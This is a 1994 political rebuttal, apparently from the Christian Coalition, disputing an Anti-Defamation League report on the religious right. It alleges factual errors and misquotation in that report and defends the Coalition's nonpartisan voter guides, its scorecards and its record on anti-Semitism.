<p>"In my twelve Senate years I worked with many of the 'Religious Right.'  They were active in the cause of Soviet Jewry (many Pentecostals and other Christians couldn't leave the Soviet Union either). They were fervent supporters of the State of Israel and we worked together often. Among the leadership of Conservative Christians I never experienced even a hint of anti-Semitism. Indeed, it was quite the opposite-I am Honorary Vice-Chairman of the ADL. I am proud of that-But in this instance I strongly disagree. From all my experience I know their report to be ill-founded. Regretably it will do more harm than good."
<p><dd>- Former U.S. Senator Rudy Boschwitz, Honorary Vice-Chairman, ADL<i> (2)</i>
<p><br><b>Introduction</b>
<p>On June 9, 1994, the Anti-Defamation League of B'nai B'rith, an organization created to fight defamation, released a report that alleges - with shoddy research and threadbare scholarship - that politically active people of faith pose a threat to the survival of American constitutional democracy. The ADL accuses numerous religious conservative organizations and leaders of anti-Semitism and bigotry. In so doing, the ADL itself has committed defamation. The ADL's new definition of "intolerance" apparently is disagreement with its liberal politics. <p>The ADL report is filled with fabrications, half-truths, innuendo and guilt by association that are reminiscent of the political style practiced by Joseph McCarthy in the 1950s.
<p>Persons of impeccable character and reputation are smeared for dubious reasons or for no reason at all. This style of politics is beneath the dignity of any organization that claims to be dedicated to fighting bigotry.
<p>The response to the ADL report has been dismay from Jews and Christians alike. "Politically active Christians, the ADL concludes, are-well, 'extremist,' 'bogus,' 'conspiratorial,' 'fevered,' 'phony,'...and yes, 'fervent.' Protestant evangelicals are simply de trop, an object of condescension and prejudice," observed William Kristol, former chief of staff to Vice President Dan Quayle.<i> (3)</i>
<p>Columnist Don Feder of the Boston Herald calls the report "an attempted political assassination." Feder adds, "Instead of debating the issues like a gentleman, it stoops to implications of anti-Semitism to discredit a legitimate voice in the values debate."<i> (4)</i>
<p>Beth Gilinsky of the Jewish Action Alliance calls the ADL report "a plainly partisan smear campaign against traditional Christians who energetically - and quite legitimately -  advocate what they believe are important moral and social values." She concludes that although "Jewish-Christian friendship will survive the onslaught from the ADL, we are getting rather tired sweeping up after repeated ADL fiascos."<i> (5)</i>
<p>This report specifically addresses those portions of the ADL document concerning the Christian Coalition. First, we will briefly examine the shoddy nature of the ADL's pseudo-research, and the report's heavy reliance on sources of questionable veracity. Second, we will discuss how the Christian Coalition really operates and discuss our true agenda of pluralistic democracy, nonpartisanship and inclusion. We also will discuss in detail the Coalition's nonpartisan voter guides and organizational structure and purposes.
<p><br><b>The ADL's Pseudo-Research</b>
<p>The ADL claims its report was the culmination of nine months of research, but it bears none of the signs of a serious research report. It is virtually devoid of specific references to resource materials.<i> (6)</i>   The reader is left to simply take it on faith that the ADL's most damning charges are true, which they are not. In fact, much of the ADL's report is simply a retread of materials (some over a decade old) from groups like People for the American Way, Americans United for the Separation of Church and State, the Institute for First Amendment Studies and other groups that long have had political axes to grind against religious conservatives.<i> (7) </i>  Most disturbing, the ADL never contacted the Christian Coalition to get its response to their unfounded charges, nor did the ADL try to ascertain the accuracy of many of the quotations used in their report. This is particularly disturbing considering the fact that many of the groups and persons attacked have been!
  longstanding friends of the Jewish community, the State of Israel and the ADL.
<p>In 1993, in seeking to settle charges that it had violated the privacy of certain individuals, the ADL sought to avoid legal liability by claiming that it enjoyed "journalistic status," making it "similar to any newspaper, magazine, or television station."<i> (8)</i>  If so, then the ADL has violated even the most basic principles of ethical journalism.
<p>Had the Christian Coalition or its leadership been contacted for clarification, many of the errors in the report would have been corrected. Instead, the report is filled with gross inaccuracies of fact. Quotations are listed without attribution, while others are listed (incredibly) as coming from the "library of People for the American Way." A quotation from Pat Robertson on church-state separation has no source listed at all. <i>(9)</i>  Of 28 quotations attributed to Paul Weyrich, founder of the Washington-based Free Congress Foundation, 22 have no source for the quote. <i>(10)</i>
<p><br><b>Numerous Factual Errors</b>
<p>Basic biographical errors abound. For instance, the ADL report says that Christian Coalition executive director Ralph Reed, Jr. once worked as a "campaign staffer for Georgia Rep. Newt Gingrich, former Georgia State Sen. Mack Mattingly and Sen. Jesse Helms of North Carolina."<i> (11)</i> Reed never has been employed on the campaign staffs of any of these individuals. He never was employed by Rep. Newt Gingrich in any capacity. He worked for Students For America, an independent organization, during the 1984 Senate race in North Carolina. He has never been employed by Senator Jesse Helms. He served as an intern for Mack Mattingly in the U.S. Senate in the summer of 1981. Mattingly was a U.S. Senator, not a state Senator, from Georgia.
<p>Reed never made the comment attributed to him by the ADL calling for "a country once again governed by Christians-'."<i>(12)</i> Indeed, when asked on the NBC Meet the Press program in 1992 whether he believed America was a "Christian nation," Reed disagreed. "I think the only difference that I would have with it is - and I should probably preface this by telling you that I began my political career as the executive director of the first Jewish national chairman of the College Republicans in the history of the Republican party - I do think that you have to acknowledge the role that Jews have played and will continue to play, and I think there's a commonality among Jews and Christians on a lot of issues because again, ultimately it's a faith that I think has a lot of common values."<i>(13)</i>
<p>It is not as though adequate documentation of Dr. Reed's views was unavailable to the ADL. As recently as February of this year, the New York Times news service carried an extensive profile that noted, "At the same time, the coalition is making overtures to minorities and Jewish leaders, hoping to bring some diversity to what has so far been a remarkably homogeneous movement." Arthur Kropp of People for the American Way added, "I disagree with [Reed] wholeheartedly, but I don't detect a mean spiritedness in him that you detect in other leaders. There's a political astuteness, perseverance, and intelligence."<i>(14)</i>
<p>The ADL also misspells the name of the Coalition's Director of Legislative Affairs, Marshall Wittmann. This could not have been a typographical error, as Wittmann's name appears incorrectly spelled throughout the report. Cursory  fact-checking should have caught this error.<i> (15)</i>
<p>So poorly researched is the report that views attributed to columnist Robert Novak are based on a quotation so badly lifted out of context that its meaning is distorted. In arguing that a "grim" Paul Weyrich, a Washington pro-family strategist, is somehow tied to anti-Semitic individuals, the report quotes Novak as saying, "I am supposed to be the Prince of Darkness, but Paul's the only person who's so tough that he gets hate mail from Mother Theresa."<i>(16)</i> This statement was made by Mr. Novak at a roast in Weyrich's honor held in Washington, DC, on April 1, 1991. Clearly, the remark is offered in jest - but it is lifted out of its proper context by the ADL to distort the true meaning.<i>(17)</i>
<p><br><b>Reckless Charges of Anti-Semitism</b>
<p>The ADL report repeatedly suggests that leaders and organizations in the pro-family movement are guilty of anti-Semitism.
<p>Stung by criticism from within the Jewish community, the ADL is backpedaling, and now denies making the accusation. For example, in a response to an earlier Christian Coalition correction of its many factual errors, the ADL weakly claimed, "the ADL does not call the Christian Coalition or any other religious right organization anti-Semitic."<i> (18)</i>
<p>Has the ADL not read its own report? It alleges that "movement leaders have demonstrated a disturbing insensitivity to Jews and Jewish concerns" (p. 2), that its agenda expresses "anti-Jewish and extremist sentiments" (p. 2), that its leaders make "public anti-Jewish pronouncements" (p. 21), that its rhetoric is "reminiscent of traditional anti-Semitic thinking" (p. 22), that its literature is peppered with "anti- Jewish nuggets" (p. 24), that its leaders have "issued a number of pronouncements antagonistic toward Jews" (p. 42), that the movement has been "tolerant of anti-Semitism" (p. 42), that its publications echo "evangelical anti-Judaism" (p. 43), and that its groups conspire with "the nation's leading anti-Semitic propaganda organization" (p. 97). <i>(19)</i>
<p>Had the ADL simply contacted the Christian Coalition and other groups defamed by the report, extensive documentation could have been provided to demonstrate our wholehearted and steadfast opposition to anti-Semitism and bigotry. 
<p>In January 1994, Pat Robertson received the highest honor of the Christians' Israel Public Action Campaign at a Jewish-Christian solidarity rally in Washington, DC. At the awards ceremony, Robertson stated, "Those of us who are evangelicals say to those of you who are Jewish, we are your friends. We stand with you and however easy it is, or however difficult it is, you can count on us as your friends, your supporters and your compatriots in a struggle to bring forth the fulfillment of that prophecy, and to make this a better world for all of us to live in."<i> (20)</i>
<p>Robertson also told the Los Angeles Times in 1993, "I am convinced on the political scene that the evangelical churches, the Catholic churches, the Orthodox Jewish people, all of us, will work together." Ralph Reed was quoted in the same story as saying, "We're working very closely with various conservative and orthodox rabbis to try to build a friendship and cooperation across theological lines on family and moral issues."<i> (21)</i>
<p>Robertson has been a major contributor to the United Jewish Appeal, has donated large sums to Jewish charities in Jerusalem, and visited the ADL offices in 1985 to meet with its board of directors. At that meeting, Robertson held hands with then-executive director Nathan Perlmutter and the entire board of directors and the group prayed together for an end to anti-Semitism and intolerance in America. Those present at the meeting report that many were moved to tears.
<p>In January 1994, Ralph Reed visited Israel on a tour sponsored by the Jerusalem Post. He met with former Prime Minister Yitzak Shamir, members of the Knesset, government officials, and the mayor of Jerusalem. Reed's trip was undertaken with the assistance of Jewish leaders in the United States to underscore the Christian Coalition's steadfast support for Israel and Jewish concerns.<i> (22)</i>
<p><br><b>Twisting Words Out of Context </b>
<p>One of the most disturbing aspects of the ADL's report is its propensity to lift words out of context so as to distort their original meaning. It does so with reference to the irresponsible charge of anti-Semitism.
<p>Citing an editorial in the Christian American newspaper, the ADL argues that the Christian Coalition believes that "Jews 'both killed the Lord Jesus and their own prophets, and have persecuted us; and they please not God, and are contrary to all men' (1 Thessalonians 2:15)." The ADL dismissively acknowledges that this quotation from the New Testament appeared in an editorial denouncing anti-Semitism, but refers to it as "typical of evangelical anti-Judaism."<i> (23)</i>
<p>In fact, the editorial (titled "Anti-Semitism in the Church") cited the above-mentioned verse from the Bible as an example of Scripture twisted by anti-Semites in the past to justify their bigotry. The editorial went on to say that "the place of the Church is to restore, not to condemn." The column concludes, "Our editorial position has been and remains clear, consistent, and Biblical: we support the State of Israel and we oppose anti-Semitism."<i> (24)</i>
<p>In the same issue of Christian American, another statement condemned bigotry against Jews. "Anti-Semitism is a serious and dangerous thing to take root and grow. Please do not give aid to this monster, and allow it to grow any further."<i> (25)</i>
<p><br><b>Reaction from the Jewish Community</b>
<p>Many in the Jewish community have reacted with disbelief to the ADL's assault on Christian leaders who have been among their best friends in the United States. Midge Decter and Elliot Abrams both have begun efforts to refute the biased report by the ADL through newspaper advertisements. Former U.S. Senator Rudy Boschwitz, an honorary vice-chairman of the ADL, has written a letter distancing himself from the report. "In my 12 Senate years, I worked with many of the 'Religious Right.' They were very active in the cause of Soviet Jewry (many Pentecostals and other Christians couldn't leave the Soviet Union either). They were fervent supporters of the State of Israel, and we worked together often. Among the leadership of conservative Christians I never experienced even a hint of anti-Semitism. Indeed, it was quite the opposite-I am honorary vice-chairman of the ADL. I am proud of that-but in this instance I strongly disagree. From all my experience I know their report to be i!
 ll-founded. Regretably it will do more harm than good."<i> (26)</i>
<p>Marshall Breger of the Heritage Foundation has noted that the report "inferred that the religious right is anti-Semitic, and I don't see how you can make that claim on the record." Marshall Wittmann, director of legislative affairs at the Christian Coalition, says, "This [report] was liberalism and not Judaism speaking." He adds, "It's quite ironic that the ADL, despite all the various anti-Semites out there, would go after people for their political views."<i> (27)</i> Wittmann, who has traveled extensively speaking to Christian Coalition seminars nationwide, recounts that he has "never encountered a whiff of anti-Semitism" among its members. <i>(28)</i>
<p>"The greatest friends the State of Israel has in America are the Christian conservatives," said Herbert Zweibon, chairman of Americans for a Safe Israel. "And [the ADL] is telling this community to get lost?" Zweibon added that the ADL, founded in 1913 to combat anti-Semitism, had "gone off track" and "adopted a liberal political agenda that has nothing to do with its mission." The ADL, he concluded, "does not represent the views of most American Jews."<i> (29)</i>
<p><br><b>Opposing David Duke</b>
<p>The ADL frequently resorts to the very same kinds of guilt-by-association lines of argument patented by virulent anti-Semites. One of the most egregious examples occurs in its allegation that Pat Robertson and Christian Coalition board member Billy McCormack gave aid and support to former klansman and neo-Nazi David Duke's Louisiana senatorial bid in 1990 and his gubernatorial bid in 1991. The allegation is not true.
<p>The report says McCormack helped to table a 1990 censure motion against Duke in the Louisiana Republican Central Committee, implying that McCormack supported Duke's racist views.<i> (30)</i> This is inaccurate. 
<p>Rhett Davis, who served as Congressman Clyde Holloway's campaign coordinator in the 1991 gubernatorial campaign, says the following about McCormack's role: 
<p>"Months before Congressman Holloway formally announced his candidacy (though David Duke had already announced), Mr. Billy McCormack of Shreveport contacted me on numerous occasions expressing his strong feeling that we needed to convince Congressman Holloway to run because no other candidate was acceptable- . 
<p>Mr. McCormack and his friends statewide began a concentrated effort to help our campaign. Mr. McCormack was very effective, and ultimately provided the margin of victory for Holloway at the Republican State Convention."<i> (31)</i>
<p>Davis also noted that McCormack brought Robertson to Louisiana to campaign against Duke in October 1991, and Robertson appeared in Baton Rouge, Lake Charles, and Shreveport at fundraisers for Holloway. (The trip was paid for by the Holloway for Governor campaign and Robertson appeared in his capacity as a private citizen.)
<p>"Additionally," Davis continued, "please note that the effort to kill a move to censure Duke-was actually led by the anti-Duke forces, fearing such a move would not hurt him, and might indeed backfire like other, similar moves."<i> (32)</i>  Other press accounts have similarly noted that the resolution was tabled to "deprive Duke of additional publicity."<i> (33)</i>
<p>In November 1991, after Clyde Holloway (the favored candidate of religious conservatives) failed to make the run-off election for Governor, pro-family activists faced a dilemma. Edwards was an advocate of legalized gambling, liberalized pornography laws, and abortion. Duke - though conservative on these issues - held anti-Semitic and racist views that are anathema to religious conservatives.
<p>How did religious conservatives react to this dilemma? In the ADL's green-spectacled fantasy, "Robertson displayed indifference to Duke's racist record, despite the fact that the national Republican Party-had repudiated and condemned the arch-bigot more than a year earlier." The ADL report gravely intones that Robertson "never denounced Duke during Duke's subsequent Louisiana gubernatorial bid- ."<i> (34)</i>  That is an irresponsible statement for which the ADL should issue a retraction and an apology.
<p>On November 13, 1991, Robertson denounced Duke on his 700 Club program before the run-off between Edwards and Duke. His words were unambiguous: 
<p>"You don't get converted one day and run for governor the next. And especially the fact that there was apparently a falsehood about his-service- it does not exist, apparently. And furthermore, he claims to be a member of a church that doesn't exist as well. There are a few little inconsistencies. Plus there's some really bad stuff in his background- . And it's very dangerous in America to foster hate, and racial hatred, hatred of Jews, bigotry - that kind of thing. It is something we just don't need in this country." <i>(35)</i>
<p>Duke lost a campaign which he had led in many polls just weeks prior to the election. Many observers noted that Robertson's statement - strategically timed a few days before the run-off for maximum impact - might have made the difference by depressing Duke's support among white evangelical voters. Many other organizations and leaders adopted a more low-profile tactic in opposing Duke. <i>(36)</i>  But Robertson boldly and publicly spoke out. Instead of praising Robertson for being the most prominent evangelical Christian figure in America to denounce Duke and prevent his election, the ADL smeared him with a falsehood.
<p><br><b>Conspiracy Theories of the Left</b>
<p>The ADL is obsessed with the notion that Christian conservatives engage in so-called "stealth" activities that disguise their agenda. It relies heavily on bizarre theories like those propagated by People for the American Way and Skipp Porteous, a Massachusetts-based conspiracist-cum-propagandist who specializes in spreading falsehoodsand innuendo about religious conservatives.
<p>By combining forces with paranoid conspiracists on the left, the ADL suggests that the distribution of nonpartisan voter guides by Christian organizations amounts to a subversion of democracy. The report asserts that "the policy of Robertson's Christian Coalition has often been to hide its election activity."<i> (37)</i>   It falsely claims that the Coalition "acknowledges having used [stealth tactics]." It compares volunteers in churches who educate voters with "Tammany's ward heelers and the old Democratic machine in Chicago."<i> (38)</i>
<p>The ADL report asserts, "The Coalition participated in the ground-breaking November 1990 elections in San Diego County in which 60 of 88 candidates associated with religious right groups were elected to office - an event that came to be known among the religious right and its critics as the 'San Diego model.' "<i> (39)</i>
<p>This statement is false. The Christian Coalition played no part in the 1990 San Diego school board elections. At the time, the Coalition barely had been in existence a year. It had no state affiliate in California and no chapter in the San Diego area. The Coalition neither practices nor endorses the "stealth tactics" the ADL claims.
<p>Contacted by the Los Angeles Times after the election, Ralph Reed of the Christian Coalition made it clear that his organization had nothing to do with the campaign. He noted that while the tendency of candidates to campaign in churches might have been an effective strategy, it probably would backfire if the candidates had not gained broad support for their views in the electorate.
<p>Reed made these remarks in his capacity as a political analyst. He did not condone, endorse, or participate in the strategy. The Times misquoted Dr. Reed, a fact that the ADL could have discovered with a more thorough search of newspaper accounts on the subject.<i> (40)</i>
<p>If the 1990 San Diego School Board races are a "model," as the ADL alleges, what were they a model for? The fact is that this strategy failed in San Diego - many of the candidates who used them were defeated in 1992 - and it never has been replicated again.
<p>The ADL report fails to mention a single other community in the nation where the strategy has been used. It alludes to an undocumented charge by Skipp Porteous that such a strategy was undertaken in Williamsville, New York, but provides no evidence and names not one candidate who employed them. <i>(41)</i> In fact, the incident in Williamsville never happened. Jeff Baran, executive director of the Christian Coalition in New York, made this clear. "I can assure you that, while I have had a few conversations with Porteous in the past, none have ever contained talk of running candidates of any kind, let alone 'stealth' candidates. As is our policy, we have not engaged in partisan politics in Williamsville or anywhere in New York- ."<i>(42)</i>  Apparently San Diego was not a "model" at all, just a threadbare scare tactic whipped up by conspiracy theorists like Skipp Porteous and People for the American Way.
<p><br><b>Guilty of Democracy</b>
<p>The ADL seeks to tar the name of Christian Coalition by finding the organization guilty of commiting democracy. Through nonpartisan voter education efforts, Christian Coalition informs voters  where candidates stand on a broad range of issues, and encourages voters to go to the polls and cast their ballots for the candidate of their choice. 	
<p>Christian Coalition leaders have repeatedly disavowed so-called "stealth tactics." They always have been accessible to the press, open to the public, and have pursued a policy of honesty and rectitude in their voter education activities.
<p>Ralph Reed told the Washington Times, "We don't encourage in any way people to run for office at any level and misrepresent their position on any issue. We believe pro-family candidates should run unapologetically on who they are and what they believe because the public shares their viewpoint." <i>(43)</i>
<p>In an appearance on CNN's Crossfire, Reed specifically denounced the so-called stealth strategy:
<p><u>Reed:</u> 	We're working on behalf of choice in education.We're working to increase the standard deduction for children. We're working to decrease the tax burden on the American family. It's a mainstream agenda for a mainstream America. Eighty percent of the American people want prayer in school, 75 percent are opposed to abortion as a form of birth control, and two out of three want choice in education.
<p><u>Sununu</u>: 	Ralph, let me ask you this. If those statistics are valid, and I think they are, then why-the stealth candidate strategy that you're getting criticized about?
<p><u>Reed:</u> 	We don't, John. We don't encourage that. We don't teach it. We don't promote it. What we think is that, because our values are held by the vast majority of Americans, go out there and articulate what you stand for, and you'll draw the people to you. That's what Ronald Reagan did, and that's what we want to do.<i> (44)</i>
<p>Coalition founder Pat Robertson has been equally clear: "People can say anything they want to, but it's not the policy of the Christian Coalition nationally to hide anything. We want to bring out the truth, not hide it. We want to know what people stand for."<i> (45)</i>
<p><br><b>As Ralph Reed argues in his forthcoming book:</b>
<p>"We do not advocate electing officials by depressing voter turnout or taking advantage of historically low voter participation. Some have inaccurately charged that religious conservatives hide their religious affiliation, conducting "stealth" campaigns in which they eschew public forums and campaign exclusively in churches. The opposite is true. The Christian Coalition, for example, distributes millions of nonpartisan voter guides that inform voters on where all the candidates stand- .We want a more open airing of who the candidates are and what they believe. Pro-family candidates win at the ballot box because of their views, not in spite of them. They are elected precisely because of who they are and what they believe." <i>(46)</i>
<p><br><b>The New York City Mode</b>
<p>If the ADL was looking for the real model of Christian Coalition activity, it would turn to the place where ADL's headquarters is located: New York City. In 1993, Queens school board member Mary Cummins led a protest movement against then-New York City School Chancellor Joseph Fernandez' imposition of the "Rainbow Curriculum," a multi-cultural course that included instruction on the gay lifestyle to students as young as six years old.
<p>A local Christian Coalition chapter was organized, coincidentally, about the same time Cummins raised her voice. The Coalition's New York City coordinator made contact with Cummins, and over the next two months the Coalition, in cooperation with the Roman Catholic Archdiocese of New York, The Congress Of Racial Equality (CORE), The National Committee For the Furtherance of Jewish Education, and the Family Defense Council, supported her reform efforts by distributing 550,000 nonpartisan voter guides in 1,300 churches and synagogues.
<p>Catholics, Hispanics and Jews joined the Christian Coalition to distribute more than 500,000 nonpartisan voter guides prior to the New York City School Board races. In addition to church and synagogue distribution, Christian Coalition voter guides were passed out at union halls, polling places and family events. The guides informed voters where 540 school board candidates stood on a broad range of issues, including school choice, voluntary prayer, merit pay for teachers and parental rights. The guides endorsed no candidates and were used for voter education. In a far-reaching show of support, Cardinal John O'Connor allowed the distribution of voter guides in 300 Catholic churches, a move that opened the door to ongoing Catholic/evangelical cooperation.
<p>As a result of Christian Coalition's voter education campaign, voter turnout reached the highest level in 20 years. Approximately 450,000 voters went to the polls, and 60 percent of 130 pro-family candidates won election. Ten city school boards had solid pro-family majorities. Among the new board members: Linda Garcia, a Hispanic mother who won election in Manhattan's Lower East Side. Cummins and her allies were re-elected in Brooklyn. Fernandez was removed from his post. <i>(47)</i>
<p>The Coalition's efforts in New York were the subject of ongoing press coverage from the beginning, and virtually every significant development was reported in detail. The Coalition held numerous news conferences in New York during the campaign to announce its activities. Indeed, when the New York Times and the New York Post listed which candidates they preferred in the contests, they did so based on information derived from the Coalition's well-documented voter guide. <i>(48)</i>  So much for "stealth."
<p>Reed told the New York Times during the campaign: "We're simply encouraging people of faith, of all religious traditions, including people of the Jewish and Roman Catholic faiths, to be informed voters."<i> (49)</i>
<p><br><b>Another Distortion: The Phantom Manual</b>
<p>Seeking more fodder for its conspiracy grist mill, the ADL repeats the tired and false accusation that the "1992 Pennsylvania Christian Coalition's 'County Action Plan' directed" members to "never mention the name Christian Coalition in Republican circles."<i> (50)</i>
<p>To state the obvious, Christian Coalition's activities within the GOP are a matter of public knowledge, especially given extensive news coverage of the last several years. With Democratic consultant Bob Beckel calling politically active evangelicals "Nazis," Mark Shields referring to them as the "American equivalent of Shiite Muslims," and Jocelyn Elders attacking them, it is difficult to see how the ADL can think that anyone is unaware of Christian involvement in the Republican party.
<p>In fact, the manual the ADL cites does not exist. The "County Action Plan" was a draft prepared by a local volunteer. It was submitted to the national office and rejected as inconsistent with the Coalition's policy of openness and inclusion.
<p>As Ralph Reed directed in a letter on October 7, 1992, to the executive director of the Pennsylvania chapter:
<p>"There are several problems with the manual-It directs Christian Coalition members not to mention their affiliation with the Christian Coalition in party circles. That is not our policy- .This manual, in its current form, does not have the authorization or imprimatur of the Christian Coalition. Please retrieve all copies- ."<i> (51)</i>
<p>The ADL need only have contacted the Christian Coalition and its staff would have gladly provided a copy of the letter. As it is, the ADL has repeated a false allegation about a manual that does not exist. In fact, the ADL barely mentions the legitimate and extensive Christian Coalition training materials, such as its 256-page Leadership Manual, which states the official policy of the organization.
<p>Indeed, the Leadership Manual  clearly urges pro-family citizens to be open, honest and up front about their views and beliefs:
<p>"First, do not limit your campaign to just churches and the Christian community. As a supporter of family values, your positions on issues affecting the family are the same as a majority of the voting public. Do not be shy in declaring that your stands on the issues are based on principle- ."
<p>"Do not use so-called 'stealth' tactics. In the past, some candidates have focused their campaigns on the churches and have not reached out to the general electorate. In the long run, this strategy is unsuccessful- .Working in the churches alone will not result in lasting success."<i> (52)</i>
<p><br><b>A Nonpartisan Coalition</b>
<p>Christian Coalition's get-out-the-vote efforts are nonpartisan, contrary to the ADL's assertions. The ADL repeats partisan claims by the Democratic National Committee, which recently has launched an orchestrated campaign of bigotry against people of faith in the political arena. It mentions specious complaints that the DNC has filed with Federal Election Commission. It fails to mention that both the FEC and the IRS have found the Christian Coalition's nonpartisan voter guides in full compliance with the law.
<p>The ADL conveniently ignores the fact that every complaint filed by the Democratic Party against the Coalition has been resolved in favor of the Christian Coalition, most notably a 1990 complaint that advertisements opposing taxpayer-funding of pornography constituted "express advocacy" on behalf of specific candidates. The FEC found that the advertisements were entirely consistent with the Christian Coalition's status as a nonpartisan issues organization. <i>(53)</i>
<p>The ADL also fails to mention the fact that the Coalition has engaged in voter education activities in a number of Democratic races. For example, in the spring of 1994 in Houston, Texas, the Coalition distributed voter guides in a campaign in which Beverly Clark, an African-American, pro-life Democrat, ran in a congressional primary. "The Christian Coalition distributed nonpartisan voter guides in over 100 black churches and made thousands of nonpartisan get-out-the-vote calls to African-American voters from grassroots phone banks."<i> (54)</i>  Clark forced Ken Bentsen, nephew of the Treasury secretary and former Texas senator, into a run-off.
<p>A voter guide distributed for the April 12 Democratic run-off listed Clark's and Bentsen's stands (labeled "supports" or "opposes") on ten public policy issues. The answers were provided to the Coalition in response to a candidate survey. Those issues were: "Increased income taxes; balanced budget amendment; abortion-on-demand; taxpayer funding of abortion; voluntary prayer in schools; mandatory sentences for violent crimes; homosexuals in the military; parental choice in education (vouchers); federal government control of health care; 'workfare' requiring able-bodied welfare recipients to work or get job training." <i>(55)</i>  The Coalition distributed a similar voter guide in a Mississippi Democratic congressional primary in 1994.
<p>In Cincinnati, Ohio in 1993, pro-family activists supported Charles Winburn, an African-American pastor of the Kingdome Church, in his run for the city council. Winburn, a registered Democrat, graduated from a Christian Coalition training school and campaigned for welfare reform and school choice. <i>(56)</i>
<p><br><b>Reaching Out to Democrats</b>
<p>The Coalition's 1994 Congressional Scorecard, which lists Senators' and Representatives' votes on a wide range of issues affecting families, makes no distinctions based upon party affiliation. Representative Charles Stenholm, (D-TX) scored a 100-percent rating on the Christian Coalition Scorecard. Representative Pete Geren, (D-TX) scored a 93- percent rating, as did Representative Gene Taylor, (D-MS). Some of the Democrats who have spoken at Christian Coalition events in recent years include: state Representative Roger Byrd (D-GA), Duval County (FL) School Board member Stan Jordan, Beverly Clark, Charles Winburn, and State Representative Woody Jenkins (D-LA).<i> (57)</i>
<p>A number of other Democrats received high ratings on the Congressional Scorecard. Sen. Richard Shelby (D-AL), for instance, agreed with Coalition positions on 71 percent of the surveyed votes. Representative Jimmy Hayes (D-LA) scored 86 percent. Representative Sonny Montgomery (D-MS) rated 71 percent, as did Representative William Lipinski (D-IL). Representative Matthew McHugh (D-NY) had a 93-percent rating.
<p>The Christian Coalition Scorecard highlighted Senate votes on such issues as: tax incentives for families; balanced budget amendment; taxpayer-funded abortions; Joycelyn Elders' nomination for surgeon general; term limits for Congress; and condoms for school children without parental consent. House votes included: cutting government waste; parental notification for abortion; abstinence-based sex education; lifting the ban on fetal tissue research; criminalizing pro-life speech. Each vote is factually described.<i> (58)</i>
<p>The 1994 Congressional Scorecard clearly states that the listing of these votes on issues affecting the family does not imply an endorsement for office or a commentary on the personal faith of the elected official. "This Scorecard is for informational purposes and is not intended to influence the outcome of any election," the Scorecard reads. "Christian Coalition does not advocate the election or defeat of any candidate, and does not endorse any political party. Scores in this Scorecard are not to be taken as a commentary on the personal faith of individual members of Congress. The information in this Scorecard is provided as a tool to help you more effectively lobby your Congressman and two Senators on issues before the 103rd Congress."<i> (59)</i>
<p>The Coalition's Scorecard and voter guides are little different from the informational ratings issued by the AFL-CIO, Americans for Democratic Action, American Conservative Union and numerous other organizations. The Coalition simply provides to voters - of all political persuasions - what they richly deserve: reference tools that show how their elected representatives in government stand on issues of concern to families.
<p><br><b>How the Christian Coalition Works</b>
<p>The ADL complains that Coalition members play a major role in some state and local party organizations because they are the most energetic participants. What is wrong with citizens taking part in the political process? The ADL takes issue with religious conservatives who are simply exercising their rights of citizenship.
<p>The Christian Coalition's Leadership Manual provides members with nuts-and-bolts information on the electoral process, from how to organize a local chapter and requirements for Christian Coalition affiliation to how to conduct a voter canvass.
<p>The Coalition's purposes, as outlined in the manual, are as follows:
<ol>
<li>To represent Christians before local councils, state legislatures and the U.S. Congress.
<li>To train Christians for effective political action.
<li>To inform Christians of timely issues and legislation.
<li>To speak out in the public arena and the media.
<li>To protest anti-Christian bigotry. <i>(60)</i>
</ol>
<p>"Your job as a Christian Coalition leader is to identify the Christian vote and get it to the polls," the manual says. <i>(61)</i>  In this sense, the Coalition's mission is no different from the League of Women Voters, the National Organization for Women, NARAL, the AFL-CIO, or Jesse Jackson's Rainbow Coalition, which has registered hundreds of thousands of African-Americans to vote.
<p>The Coalition's policy stances are rooted in faith - as were America's founders, who spoke of the people of this nation as being endowed by their "Creator" with "certain inalienable rights." As Reed said on NBC's Meet the Press:  "The apostle Paul told the early Christians to render unto Caesar the things that are Caesar's and to exercise their civic responsibility. And what we're saying is that in a democracy, when you render unto the government that which is due it, that means your vote, your informed participation and your involvement."<i> (62)</i>
<p><br><b>Personalizing Public Policy Differences</b>
<p>The ADL apparently regards grassroots democracy as a threat to, in its words, "tolerance and pluralism." In fact, the Coalition and the ADL simply disagree on public policy issues. The Coalition does not support taxpayer-funded abortion as a form of birth control. Neither do 87 percent of the American people, according to a recent survey. But the ADL equates a pro-family, pro-life position with intolerance. Indeed, Abe Foxman, executive director of the ADL, even charges that supporting the sanctity of innocent human life creates "hostility" in which "tolerance and pluralism inevitably plummet." <i>(63) </i> To equate one's public policy views with "tolerance" and impugn one's political foes as opposed to "pluralism" is intellectually dishonest. 
<p>The Christian Coalition believes students should be allowed to exercise their First Amendment right to free speech, including speech of a religious content. The ADL says this somehow violates the separation of church and state. If so, it may have a dispute with President Clinton as well. In a town hall meeting in Charlotte, North Carolina, in April 1994, Clinton stated his view that voluntary prayer does not violate the Constitution:  "Now, it's been carried to such an extent now where they say, some people have said you can't have a prayer at a graduation exercise. I personally didn't agree with that. Why? Because if you're praying at a graduation exercise or a sporting event, it's a big open air thing, and no one's being coerced."
<p>"I do not agree that people should not be able to freely pray and to acknowledge God. We have a chaplain in Congress, in the Senate and the House." <i>(64)</i>
<p>Does the ADL believe that President Clinton is undermining pluralism by his opposition to the Lee v. Weisman decision of 1992 that bans high school graduation prayer? His position is identical to that of the Christian Coalition.
<p>We may believe the ADL is wrong about some policy issues, but unlike the ADL we do not question their right to hold such views or their commitment to pluralism. And we stand arm-and-arm with the ADL in giving no quarter to anti-Semitism or bigotry of any kind.
<p><br><b>Partisan Attacks</b>
<p>Unfortunately, the ADL report has become part of a highly partisan campaign against religious folk launched by the national Democratic party. By lending its name to this campaign against people of faith, the ADL risks being viewed as an organization driven more by partisan politics than Jewish concerns.
<p>In August 1993, the Washington-based National Jewish Democratic Council held a conference to organize a 40-group coalition to oppose Christian conservatives. Among the participants were Arthur Kropp, president of People for the American Way, and Clinton Cabinet members Federico Pena and Donna Shalala.<i> (65)</i>
<p>Throughout 1993, Lieutenant Governor Don Beyer of Virginia ran a particularly vicious, bigoted campaign against Mike Farris, the Republican candidate for lieutenant governor. Beyer used materials supplied by People for the American Way which accused Farris of seeking to ban books such as The Wizard of Oz. The Washington Post concluded that the charges were false. Michael Barone of U.S. News and World Report said that the allegation against Farris "unfairly distorts and ridicules" his views.<i> (66)</i>
<p>In June of 1994, just days after the ADL released its report, Representative Vic Fazio (D-CA), chairman of the Democratic Congressional Campaign Committee, launched a new attack on religious conservatives, calling them "fire-breathing fanatics." The Democratic National Committee even has set up a bulletin board on Compuserve called "Radical Right," which contains speeches and other party documents designed to assault Christians.
